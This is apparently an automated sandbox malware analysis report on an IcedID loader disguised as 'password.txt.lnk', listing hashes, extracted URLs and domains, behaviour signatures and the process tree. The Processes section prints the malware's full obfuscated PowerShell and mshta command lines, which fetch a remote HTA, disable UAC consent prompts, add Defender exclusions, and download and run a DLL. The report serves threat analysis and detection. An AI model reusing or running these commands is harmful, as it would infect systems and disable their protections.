Analysis
-
max time kernel
1789s -
max time network
1802s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
23-06-2022 16:06
Static task
static1
Behavioral task
behavioral1
Sample
password.txt.lnk
Resource
win7-20220414-en
General
-
Target
password.txt.lnk
-
Size
1KB
-
MD5
ee5dc8a66298685a6f6790e32e1a006b
-
SHA1
8bd4a8e15b8c097283b67dd8201ed41e01cbe794
-
SHA256
65e7327a6f3efb230a4d61966182f1d1c592aa222f4f820afaca6617680d09bd
-
SHA512
8c0164d4576959d7d474cd39545db1564e459f0ab55e51df601d132d6667b41e8751d236a3850934b0575ae9c1e09e230019609669276d36849da40400f0613c
Malware Config
Extracted
https://wang-data-science.com/wp-content/themes/scapeshot/etest.hta
Extracted
icedid
3289900935
ilzenhwery.com
Signatures
-
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
-
Blocklisted process makes network request 5 IoCs
Processes:
mshta.exepowershell.exerundll32.exeflow pid process 5 1480 mshta.exe 9 1480 mshta.exe 13 1480 mshta.exe 17 4100 powershell.exe 23 1104 rundll32.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exemshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation mshta.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 1104 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exerundll32.exepid process 876 powershell.exe 876 powershell.exe 4100 powershell.exe 4100 powershell.exe 1104 rundll32.exe 1104 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 876 powershell.exe Token: SeDebugPrivilege 4100 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.exepowershell.exemshta.exepowershell.exedescription pid process target process PID 2100 wrote to memory of 876 2100 cmd.exe powershell.exe PID 2100 wrote to memory of 876 2100 cmd.exe powershell.exe PID 876 wrote to memory of 1480 876 powershell.exe mshta.exe PID 876 wrote to memory of 1480 876 powershell.exe mshta.exe PID 1480 wrote to memory of 4100 1480 mshta.exe powershell.exe PID 1480 wrote to memory of 4100 1480 mshta.exe powershell.exe PID 4100 wrote to memory of 1104 4100 powershell.exe rundll32.exe PID 4100 wrote to memory of 1104 4100 powershell.exe rundll32.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\password.txt.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $xrrCQEUf = [convert]::FromBase64String('PjIv');$rvIxkgme = [convert]::FromBase64String('GgQfAxZXHwMDBwRNWFgAFhkQWhMWAxZaBBQeEhkUElkUGBpYAAdaFBgZAxIZA1gDHxIaEgRYBBQWBxIEHxgDWBIDEgQDWR8DFg==');$BJtiaLic = -join($xrrCQEUf | % {[char] ($_ -bxor 0x77)});$uVgPreUS = -join ($rvIxkgme | % { [char] ($_ -bxor 0x77)});sal ABJmyxbD $BJtiaLic;ABJmyxbD $uVgPreUS2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://wang-data-science.com/wp-content/themes/scapeshot/etest.hta3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function BpCExIjDrdGi($nnVDyzh, $cfMRXTCG){[IO.File]::WriteAllBytes($nnVDyzh, $cfMRXTCG)};function BgqJOAPBzie($nnVDyzh){if($nnVDyzh.EndsWith((fibYakKGHnxcX @(66842,66896,66904,66904))) -eq $True){rundll32.exe $nnVDyzh ,RunObject }elseif($nnVDyzh.EndsWith((fibYakKGHnxcX @(66842,66908,66911,66845))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $nnVDyzh}else{Start-Process $nnVDyzh}};function YDwYoXfkvCiX($BUsiXmWVUTyBGlhNN){$uTDDSkKDrMcCukgsB = New-Object (fibYakKGHnxcX @(66874,66897,66912,66842,66883,66897,66894,66863,66904,66901,66897,66906,66912));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cfMRXTCG = $uTDDSkKDrMcCukgsB.DownloadData($BUsiXmWVUTyBGlhNN);return $cfMRXTCG};function fibYakKGHnxcX($ZPSYkAbHDFF){$vRDpSXA=66796;$ifTikh=$Null;foreach($efauSZiRIFLSvo in $ZPSYkAbHDFF){$ifTikh+=[char]($efauSZiRIFLSvo-$vRDpSXA)};return $ifTikh};function KTcwOeFIaImkX(){$kyNirfktEagoeXnmMr = $env:AppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$nGDxbpOvNNZvVHtpfa=$env:AppData; Add-MpPreference -ExclusionPath $nGDxbpOvNNZvVHtpfa;Add-MpPreference -ExclusionExtension ?lnk?;$PkAZgfWOTxnZ = $kyNirfktEagoeXnmMr + 'test.dll'; if (Test-Path -Path $PkAZgfWOTxnZ){BgqJOAPBzie $PkAZgfWOTxnZ;}Else{ $SpgGVjW = YDwYoXfkvCiX (fibYakKGHnxcX @(66900,66912,66912,66908,66911,66854,66843,66843,66915,66893,66906,66899,66841,66896,66893,66912,66893,66841,66911,66895,66901,66897,66906,66895,66897,66842,66895,66907,66905,66843,66915,66908,66841,66895,66907,66906,66912,66897,66906,66912,66843,66912,66900,66897,66905,66897,66911,66843,66911,66895,66893,66908,66897,66911,66900,66907,66912,66843,66912,66897,66911,66912,66842,66896,66904,66904));BpCExIjDrdGi $PkAZgfWOTxnZ $SpgGVjW;BgqJOAPBzie $PkAZgfWOTxnZ;};;;;}KTcwOeFIaImkX;" uac4⤵
- UAC bypass
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\test.dll RunObject5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD575b4b2eecda41cec059c973abb1114c0
SHA111dadf4817ead21b0340ce529ee9bbd7f0422668
SHA2565540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134
SHA51287feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626
-
C:\Users\Admin\AppData\Roaming\test.dllFilesize
858KB
MD5f0b052dad1a3605cd3e6d044cd315388
SHA1fe3d8f50b494f400bd47842d580343f38be6a04b
SHA2564798655c9e1df924b92d224c53dce0e3e9028318a5fa6ee4e6bd9f0f32154cdd
SHA512c8ee79ae9739c1486f0a89039b69afa6057d34bf39d2be58187d265662066c052776627fa58aa519e98c072704437fc3eaa190923e351414ef9a149509ff716b
-
C:\Users\Admin\AppData\Roaming\test.dllFilesize
858KB
MD5f0b052dad1a3605cd3e6d044cd315388
SHA1fe3d8f50b494f400bd47842d580343f38be6a04b
SHA2564798655c9e1df924b92d224c53dce0e3e9028318a5fa6ee4e6bd9f0f32154cdd
SHA512c8ee79ae9739c1486f0a89039b69afa6057d34bf39d2be58187d265662066c052776627fa58aa519e98c072704437fc3eaa190923e351414ef9a149509ff716b
-
memory/876-134-0x00007FF8E7ED0000-0x00007FF8E8991000-memory.dmpFilesize
10.8MB
-
memory/876-131-0x000001C235130000-0x000001C235152000-memory.dmpFilesize
136KB
-
memory/876-130-0x0000000000000000-mapping.dmp
-
memory/1104-139-0x0000000000000000-mapping.dmp
-
memory/1104-143-0x0000000180000000-0x0000000180009000-memory.dmpFilesize
36KB
-
memory/1480-132-0x0000000000000000-mapping.dmp
-
memory/4100-135-0x0000000000000000-mapping.dmp
-
memory/4100-138-0x00007FF8E6D40000-0x00007FF8E7801000-memory.dmpFilesize
10.8MB
-
memory/4100-142-0x00007FF8E6D40000-0x00007FF8E7801000-memory.dmpFilesize
10.8MB